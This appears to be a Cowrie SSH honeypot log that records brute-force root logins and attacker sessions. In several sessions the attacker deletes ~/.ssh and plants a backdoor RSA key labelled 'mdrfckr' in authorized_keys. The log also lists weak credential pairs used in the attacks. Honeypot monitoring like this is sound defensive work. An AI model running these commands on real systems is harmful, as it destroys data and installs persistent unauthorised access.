{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:25:05.008714Z","src_ip":"45.159.112.103","session":"adaaefcf7739"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:25:05.118532Z","src_ip":"45.159.112.103","session":"adaaefcf7739"}
{"eventid":"cowrie.login.success","username":"root","password":"Micro@123","message":"login attempt [root/Micro@123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:25:05.598468Z","src_ip":"45.159.112.103","session":"adaaefcf7739"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T00:25:05.836360Z","src_ip":"45.159.112.103","session":"adaaefcf7739"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T00:25:05.837041Z","src_ip":"45.159.112.103","session":"adaaefcf7739"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T00:25:05.837775Z","src_ip":"45.159.112.103","session":"adaaefcf7739"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:25:05.949130Z","src_ip":"45.159.112.103","session":"adaaefcf7739"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T00:25:06.273457Z","src_ip":"45.159.112.103","session":"adaaefcf7739"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T00:25:06.274292Z","src_ip":"45.159.112.103","session":"adaaefcf7739"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T00:25:06.386507Z","src_ip":"45.159.112.103","session":"adaaefcf7739"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:25:06.387492Z","src_ip":"45.159.112.103","session":"adaaefcf7739"}
{"eventid":"cowrie.session.connect","src_ip":"45.159.112.103","src_port":59390,"dst_ip":"1.2.3.4","dst_port":22,"session":"8b23f50da021","protocol":"ssh","message":"New connection: 45.159.112.103:59390 (1.2.3.4:22) [session: 8b23f50da021]","sensor":"my-vps","timestamp":"2025-08-26T00:25:06.496696Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:25:06.497323Z","src_ip":"45.159.112.103","session":"8b23f50da021"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:25:06.608714Z","src_ip":"45.159.112.103","session":"8b23f50da021"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T00:25:07.094903Z","src_ip":"45.159.112.103","session":"8b23f50da021"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:25:08.209211Z","src_ip":"45.159.112.103","session":"8b23f50da021"}
{"eventid":"cowrie.session.connect","src_ip":"45.159.112.103","src_port":59392,"dst_ip":"1.2.3.4","dst_port":22,"session":"60dc9e48f883","protocol":"ssh","message":"New connection: 45.159.112.103:59392 (1.2.3.4:22) [session: 60dc9e48f883]","sensor":"my-vps","timestamp":"2025-08-26T00:25:08.312293Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:25:08.313146Z","src_ip":"45.159.112.103","session":"60dc9e48f883"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:25:08.422845Z","src_ip":"45.159.112.103","session":"60dc9e48f883"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:25:08.902296Z","src_ip":"45.159.112.103","session":"60dc9e48f883"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:25:09.014911Z","src_ip":"45.159.112.103","session":"60dc9e48f883"}
{"eventid":"cowrie.session.closed","duration":"4.0","message":"Connection lost after 4.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:25:09.020879Z","src_ip":"45.159.112.103","session":"adaaefcf7739"}
{"eventid":"cowrie.session.connect","src_ip":"24.108.102.132","src_port":58948,"dst_ip":"1.2.3.4","dst_port":22,"session":"6409596731f6","protocol":"ssh","message":"New connection: 24.108.102.132:58948 (1.2.3.4:22) [session: 6409596731f6]","sensor":"my-vps","timestamp":"2025-08-26T00:25:28.571811Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:25:28.572769Z","src_ip":"24.108.102.132","session":"6409596731f6"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:25:28.742941Z","src_ip":"24.108.102.132","session":"6409596731f6"}
{"eventid":"cowrie.login.success","username":"root","password":"Ff123456.","message":"login attempt [root/Ff123456.] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:25:29.453307Z","src_ip":"24.108.102.132","session":"6409596731f6"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T00:25:29.808246Z","src_ip":"24.108.102.132","session":"6409596731f6"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T00:25:29.809196Z","src_ip":"24.108.102.132","session":"6409596731f6"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T00:25:29.810621Z","src_ip":"24.108.102.132","session":"6409596731f6"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:25:29.978562Z","src_ip":"24.108.102.132","session":"6409596731f6"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T00:25:30.412726Z","src_ip":"24.108.102.132","session":"6409596731f6"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T00:25:30.413482Z","src_ip":"24.108.102.132","session":"6409596731f6"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T00:25:30.582743Z","src_ip":"24.108.102.132","session":"6409596731f6"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:25:30.583885Z","src_ip":"24.108.102.132","session":"6409596731f6"}
{"eventid":"cowrie.session.connect","src_ip":"24.108.102.132","src_port":58964,"dst_ip":"1.2.3.4","dst_port":22,"session":"327ae591b975","protocol":"ssh","message":"New connection: 24.108.102.132:58964 (1.2.3.4:22) [session: 327ae591b975]","sensor":"my-vps","timestamp":"2025-08-26T00:25:30.759432Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:25:30.764766Z","src_ip":"24.108.102.132","session":"327ae591b975"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:25:30.938310Z","src_ip":"24.108.102.132","session":"327ae591b975"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T00:25:31.636292Z","src_ip":"24.108.102.132","session":"327ae591b975"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:25:32.814723Z","src_ip":"24.108.102.132","session":"327ae591b975"}
{"eventid":"cowrie.session.connect","src_ip":"24.108.102.132","src_port":58972,"dst_ip":"1.2.3.4","dst_port":22,"session":"a0519e5e95c6","protocol":"ssh","message":"New connection: 24.108.102.132:58972 (1.2.3.4:22) [session: a0519e5e95c6]","sensor":"my-vps","timestamp":"2025-08-26T00:25:32.982160Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:25:32.987496Z","src_ip":"24.108.102.132","session":"a0519e5e95c6"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:25:33.166515Z","src_ip":"24.108.102.132","session":"a0519e5e95c6"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:25:33.885046Z","src_ip":"24.108.102.132","session":"a0519e5e95c6"}
{"eventid":"cowrie.session.closed","duration":"5.5","message":"Connection lost after 5.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:25:34.048951Z","src_ip":"24.108.102.132","session":"6409596731f6"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:25:34.069194Z","src_ip":"24.108.102.132","session":"a0519e5e95c6"}
{"eventid":"cowrie.session.connect","src_ip":"27.112.78.245","src_port":53006,"dst_ip":"1.2.3.4","dst_port":22,"session":"25632a8a9919","protocol":"ssh","message":"New connection: 27.112.78.245:53006 (1.2.3.4:22) [session: 25632a8a9919]","sensor":"my-vps","timestamp":"2025-08-26T00:25:34.888467Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:25:34.889392Z","src_ip":"27.112.78.245","session":"25632a8a9919"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:25:35.148642Z","src_ip":"27.112.78.245","session":"25632a8a9919"}
{"eventid":"cowrie.login.success","username":"root","password":"Tn123456","message":"login attempt [root/Tn123456] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:25:36.697943Z","src_ip":"27.112.78.245","session":"25632a8a9919"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T00:25:37.281037Z","src_ip":"27.112.78.245","session":"25632a8a9919"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T00:25:37.281781Z","src_ip":"27.112.78.245","session":"25632a8a9919"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T00:25:37.282573Z","src_ip":"27.112.78.245","session":"25632a8a9919"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:25:37.545088Z","src_ip":"27.112.78.245","session":"25632a8a9919"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T00:25:38.816489Z","src_ip":"27.112.78.245","session":"25632a8a9919"}
